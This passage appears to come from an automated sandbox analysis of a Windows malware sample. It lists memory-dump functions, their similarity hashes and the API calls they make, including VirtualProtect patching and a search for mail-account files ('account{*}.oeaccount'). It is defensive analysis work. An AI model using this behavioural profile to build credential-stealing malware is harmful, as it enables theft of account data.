  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4E59, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystring
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBCD2, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 99filesynchronizationpipe
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1E86, Relevance: 6.0, APIs: 4, Instructions: 39 Total matches: 34memorystring
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
